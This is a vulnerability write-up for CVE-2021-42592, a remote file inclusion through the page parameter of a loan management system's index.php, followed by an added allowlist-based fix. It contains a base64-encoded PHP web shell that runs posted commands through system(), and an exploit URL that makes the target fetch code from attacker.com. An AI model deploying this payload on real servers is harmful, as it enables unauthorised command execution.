CVE-2021-42592
Description
** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.
Ratings
- Attacker Value: Very High
- Exploitability: Very High
Technical Analysis
A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Loan Management System 1.0 via the page parameter to index.php.
The bug affects the [index.php] file through the [page] parameter due to unsafe usage of the [include] function on remote input; if we take a look at the index.php file we can see the following code:
<?php $page = isset($_GET['page']) ? $_GET['page'] :'home'; ?> <?php include $page.'.php' ?>
The index file has a parameter, page, and by default its value is home. It then includes the home page, adding .php to it.
The attacker logs in to the panel, then creates a PHP file that contains malicious PHP code on a remote server, then passes the malicious file URL to the target through the [page] parameter, and the target executes the code, which gives the attacker permission to perform malicious activities (delete, create, modify, etc.) on the target server and to achieve RCE (remote code execution).
Note: To make the server execute your malicious code, your code must look like this:
<?php echo base64_decode("PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+CgpDTUQgPGlucHV0IG5hbWU9ImNtZCIgdHlwZT0idGV4dCI+Cgo8YnI+CjxpbnB1dCBuYW1lPSJzdWIiIHR5cGU9InN1Ym1pdCI+CjwvZm9ybT4KPD9waHAKZWNobyAiPHByZT4iOwpzeXN0ZW0oQCRfUE9TVFsiY21kIl0pOwplY2hvICI8L3ByZT4iOwo/Pg=="); ?>
E.g.: http://target.com/index.php?page=http://attacker.com/exploit
Note: Don’t add [.php] to your attacker URL because the script will add .php at the end of the [page] parameter value automatically.
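Mitigation sketch for the include shown above, as an added example that is not part of the original assessment or the application's code: the page value is checked against a fixed allowlist before it reaches include. The page names and the /var/www/app path are assumptions; a URL in include also only works when PHP's allow_url_include setting is enabled, so keeping it Off is a second layer.

```php
<?php
declare(strict_types=1);

// Added example, not code from the original assessment or from the application.
// Assumption: these page names are hypothetical; list the app's real view files.
const ALLOWED_PAGES = ['home', 'loans', 'payments', 'borrowers'];

/**
 * Resolve a request's page value to a local view file.
 * Returns null for anything not on the allowlist, so URLs (http://, php://),
 * traversal sequences and array values never reach include.
 */
function resolve_page($requested, string $viewDir): ?string
{
    if ($requested === null) {
        $requested = 'home';            // same default as the original code
    }
    if (!is_string($requested) || !in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    return $viewDir . DIRECTORY_SEPARATOR . $requested . '.php';
}

// Constructed inputs showing what the check accepts and rejects (CLI run only).
if (PHP_SAPI === 'cli') {
    $samples = [null, 'home', 'loans', 'http://attacker.com/exploit',
                '../../etc/passwd', ['x'], 'home.php'];
    foreach ($samples as $s) {
        $r = resolve_page($s, '/var/www/app');   // assumed install path
        printf("%-36s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES), $r ?? 'REJECTED');
    }
    exit;
}

// Web entry point: replaces `include $page.'.php'` in index.php.
$path = resolve_page($_GET['page'] ?? null, __DIR__);
if ($path !== null && is_file($path)) {
    include $path;
} else {
    http_response_code(404);
}
```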